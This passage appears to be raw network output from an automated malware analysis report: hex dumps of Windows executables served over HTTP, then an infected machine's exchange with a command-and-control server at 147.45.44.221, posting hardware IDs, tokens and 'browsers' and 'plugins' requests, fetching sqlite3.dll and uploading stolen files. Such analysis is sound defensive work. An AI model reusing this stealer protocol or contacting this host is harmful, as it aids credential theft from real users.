00 00 10 09 00 00 02 00 00 00 ca 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b0 08 00 00 00 20 09 00 00 0a 00 00 00 cc 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d8 41 00 00 00 30 09 00 00 42 00 00 00 d6 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 21 Oct 2024 06:47:28 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 08:49:08 GMTETag: "6dde8-5e7ea271b0900"Accept-Ranges: bytesContent-Length: 450024Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 06 00 00 04 00 00 2c e0 06 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 67 04 00 82 cf 01 00 e8 72 06 00 18 01 00 00 00 a0 06 00 f0 03 00 00 00 00 00 00 00 00 00 00 00 9c 06 00 e8 41 00 00 00 b0 06 00 ac 3d 00 00 60 78 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 77 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 70 06 00 e4 02 00 00 c0 63 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 92 26 06 00 00 10 00 00 00 28 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 29 00 00 00 40 06 00 00 18 00 00 00 2c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 ac 13 00 00 00 70 06 00 00 14 00 00 00 44 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 90 06 00 00 02 00 00 00 58 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f0 03 00 00 00 a0 06 00 00 04 00 00 00 5a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 ac 3d 00 00 00 b0 06 00 00 3e 00 00 00 5e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 21 Oct 2024 06:47:29 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 08:49:08 GMTETag: "1f3950-5e7ea271b0900"Accept-Ranges: bytesContent-Length: 2046288Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca 1d 00 5c 04 00 00 80 26 1d 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 89 d7 19 00 00 10 00 00 00 d8 19 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6c ef 03 00 00 f0 19 00 00 f0 03 00 00 dc 19 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 52 00 00 00 e0 1d 00 00 2e 00 00 00 cc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 40 1e 00 00 02 00 00 00 fa 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 50 1e 00 00 04 00 00 00 fc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 5c 08 01 00 00 60 1e 00 00 0a 01 00 00 00 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 21 Oct 2024 06:47:31 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 08:49:08 GMTETag: "3ef50-5e7ea271b0900"Accept-Ranges: bytesContent-Length: 257872Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b 03 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 26 cb 02 00 00 10 00 00 00 cc 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 d4 ab 00 00 00 e0 02 00 00 ac 00 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 0b 00 00 00 90 03 00 00 08 00 00 00 7c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 a0 03 00 00 02 00 00 00 84 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 80 03 00 00 00 b0 03 00 00 04 00 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 c8 35 00 00 00 c0 03 00 00 36 00 00 00 8a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 21 Oct 2024 06:47:31 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 08:49:08 GMTETag: "13bf0-5e7ea271b0900"Accept-Ranges: bytesContent-Length: 80880Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 e3 00 00 14 09 00 00 b8 00 01 00 8c 00 00 00 00 10 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 fa 00 00 f0 41 00 00 00 20 01 00 10 0a 00 00 80 20 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 20 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 b4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 dc 00 00 00 10 00 00 00 de 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 f4 05 00 00 00 f0 00 00 00 02 00 00 00 e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 84 05 00 00 00 00 01 00 00 06 00 00 00 e4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 00 04 00 00 00 10 01 00 00 04 00 00 00 ea 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 10 0a 00 00 00 20 01 00 00 0c 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 147.45.44.221Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST /28166bd28a5d19e6.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DAFBGHCAKKFCAKEBKJKKHost: 147.45.44.221Content-Length: 219Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 41 46 42 47 48 43 41 4b 4b 46 43 41 4b 45 42 4b 4a 4b 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 35 37 39 34 30 30 32 39 30 43 35 33 35 32 38 30 30 33 31 39 37 0d 0a 2d 2d 2d 2d 2d 2d 44 41 46 42 47 48 43 41 4b 4b 46 43 41 4b 45 42 4b 4a 4b 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6e 66 7a 65 6f 6e 77 63 69 74 75 63 0d 0a 2d 2d 2d 2d 2d 2d 44 41 46 42 47 48 43 41 4b 4b 46 43 41 4b 45 42 4b 4a 4b 4b 2d 2d 0d 0a Data Ascii: ------DAFBGHCAKKFCAKEBKJKKContent-Disposition: form-data; name="hwid"D579400290C53528003197------DAFBGHCAKKFCAKEBKJKKContent-Disposition: form-data; name="build"nfzeonwcituc------DAFBGHCAKKFCAKEBKJKK--
                      Source: global trafficHTTP traffic detected: POST /28166bd28a5d19e6.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IECBGIDAEHCGDGCBKEBGHost: 147.45.44.221Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 45 43 42 47 49 44 41 45 48 43 47 44 47 43 42 4b 45 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 63 33 61 66 34 61 38 35 36 38 31 64 37 39 65 65 66 62 39 65 33 39 31 31 36 39 37 65 31 30 66 30 35 63 65 33 38 34 32 63 61 36 33 31 65 35 62 61 34 37 37 36 33 63 35 62 34 32 36 35 64 63 65 35 38 33 39 37 32 66 37 0d 0a 2d 2d 2d 2d 2d 2d 49 45 43 42 47 49 44 41 45 48 43 47 44 47 43 42 4b 45 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 49 45 43 42 47 49 44 41 45 48 43 47 44 47 43 42 4b 45 42 47 2d 2d 0d 0a Data Ascii: ------IECBGIDAEHCGDGCBKEBGContent-Disposition: form-data; name="token"1c3af4a85681d79eefb9e3911697e10f05ce3842ca631e5ba47763c5b4265dce583972f7------IECBGIDAEHCGDGCBKEBGContent-Disposition: form-data; name="message"browsers------IECBGIDAEHCGDGCBKEBG--
                      Source: global trafficHTTP traffic detected: POST /28166bd28a5d19e6.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EHIIIJDAAAAAAKECBFBAHost: 147.45.44.221Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 48 49 49 49 4a 44 41 41 41 41 41 41 4b 45 43 42 46 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 63 33 61 66 34 61 38 35 36 38 31 64 37 39 65 65 66 62 39 65 33 39 31 31 36 39 37 65 31 30 66 30 35 63 65 33 38 34 32 63 61 36 33 31 65 35 62 61 34 37 37 36 33 63 35 62 34 32 36 35 64 63 65 35 38 33 39 37 32 66 37 0d 0a 2d 2d 2d 2d 2d 2d 45 48 49 49 49 4a 44 41 41 41 41 41 41 4b 45 43 42 46 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 45 48 49 49 49 4a 44 41 41 41 41 41 41 4b 45 43 42 46 42 41 2d 2d 0d 0a Data Ascii: ------EHIIIJDAAAAAAKECBFBAContent-Disposition: form-data; name="token"1c3af4a85681d79eefb9e3911697e10f05ce3842ca631e5ba47763c5b4265dce583972f7------EHIIIJDAAAAAAKECBFBAContent-Disposition: form-data; name="message"plugins------EHIIIJDAAAAAAKECBFBA--
                      Source: global trafficHTTP traffic detected: POST /28166bd28a5d19e6.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CAEGHIJEHJDHIDHIDAEHHost: 147.45.44.221Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 41 45 47 48 49 4a 45 48 4a 44 48 49 44 48 49 44 41 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 63 33 61 66 34 61 38 35 36 38 31 64 37 39 65 65 66 62 39 65 33 39 31 31 36 39 37 65 31 30 66 30 35 63 65 33 38 34 32 63 61 36 33 31 65 35 62 61 34 37 37 36 33 63 35 62 34 32 36 35 64 63 65 35 38 33 39 37 32 66 37 0d 0a 2d 2d 2d 2d 2d 2d 43 41 45 47 48 49 4a 45 48 4a 44 48 49 44 48 49 44 41 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 43 41 45 47 48 49 4a 45 48 4a 44 48 49 44 48 49 44 41 45 48 2d 2d 0d 0a Data Ascii: ------CAEGHIJEHJDHIDHIDAEHContent-Disposition: form-data; name="token"1c3af4a85681d79eefb9e3911697e10f05ce3842ca631e5ba47763c5b4265dce583972f7------CAEGHIJEHJDHIDHIDAEHContent-Disposition: form-data; name="message"fplugins------CAEGHIJEHJDHIDHIDAEH--
                      Source: global trafficHTTP traffic detected: POST /28166bd28a5d19e6.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BGIDBKKKKKFBGDGDHIDBHost: 147.45.44.221Content-Length: 5859Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /3538548809da56b2/sqlite3.dll HTTP/1.1Host: 147.45.44.221Cache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST /28166bd28a5d19e6.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HJKJKKKJJJKJKFHJJJJEHost: 147.45.44.221Content-Length: 4599Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST /28166bd28a5d19e6.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IECBGIDAEHCGDGCBKEBGHost: 147.45.44.221Content-Length: 1451Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST /28166bd28a5d19e6.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EBKEHJJDAAAAKECBGHDAHost: 147.45.44.221Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 42 4b 45 48 4a 4a 44 41 41 41 41 4b 45 43 42 47 48 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 63 33 61 66 34 61 38 35 36 38 31 64 37 39 65 65 66 62 39 65 33 39 31 31 36 39 37 65 31 30 66 30 35 63 65 33 38 34 32 63 61 36 33 31 65 35 62 61 34 37 37 36 33 63 35 62 34 32 36 35 64 63 65 35 38 33 39 37 32 66 37 0d 0a 2d 2d 2d 2d 2d 2d 45 42 4b 45 48 4a 4a 44 41 41 41 41 4b 45 43 42 47 48 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 45 42 4b 45 48 4a 4a 44 41 41 41 41 4b 45 43 42 47 48 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 45 42 4b 45 48 4a 4a 44 41 41 41 41 4b 45 43 42 47 48 44 41 2d 2d 0d 0a Data Ascii: ------EBKEHJJDAAAAKECBGHDAContent-Disposition: form-data; name="token"1c3af4a85681d79eefb9e3911697e10f05ce3842ca631e5ba47763c5b4265dce583972f7------EBKEHJJDAAAAKECBGHDAContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------EBKEHJJDAAAAKECBGHDAContent-Disposition: form-data; name="file"------EBKEHJJDAAAAKECBGHDA--
                      Source: global trafficHTTP traffic detected: POST /28166bd28a5d19e6.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EGCFIDAFBFBAKFHJEGIJHost: 147.45.44.221Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 47 43 46 49 44 41 46 42 46 42 41 4b 46 48 4a 45 47 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 63 33 61 66 34 61 38 35 36 38 31 64 37 39 65 65 66 62 39 65 33 39 31 31 36 39 37 65 31 30 66 30 35 63 65 33 38 34 32 63 61 36 33 31 65 35 62 61 34 37 37 36 33 63 35 62 34 32 36 35 64 63 65 35 38 33 39 37 32 66 37 0d 0a 2d 2d 2d 2d 2d 2d 45 47 43 46 49 44 41 46 42 46 42 41 4b 46 48 4a 45 47 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 